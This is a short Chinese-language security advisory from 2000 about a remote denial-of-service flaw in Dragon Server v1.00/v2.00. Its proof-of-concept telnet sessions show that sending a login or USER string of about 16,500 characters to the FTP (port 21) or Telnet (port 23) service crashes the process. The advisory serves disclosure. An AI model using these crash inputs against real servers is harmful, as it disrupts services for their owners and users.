Dragon Server拒绝服务漏洞发布时间:2000-04-17 更新时间:2000-04-17 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Dragon Server v1.00,v2.00详细描述 Dragon Server v1.00,v2.00存在拒绝服务漏洞 。 测试代码 1: FTP Server (21端口)服务登录函数存在溢出问题 [hellme@die-communitech.net$ telnet example.com 21 Trying example.com... Connected to example.com. Escape character is '^]' 220 Dragon Server v2.0, ready. USER [buffer] 此处[buffer]大约为16,500个字符将导致服务进程崩溃 2: Telnet Server (23端口)服务登录函数存在溢出问题 [hellme@die-communitech.net$ telnet example.com Trying example.com... Connected to example.com. Escape character is '^]'. Dragon Server v2.0, ready. Login: [buffer] 此处[buffer]大约为16,500个字符将导致服务进程崩溃 解决方案 尚无 相关信息 |
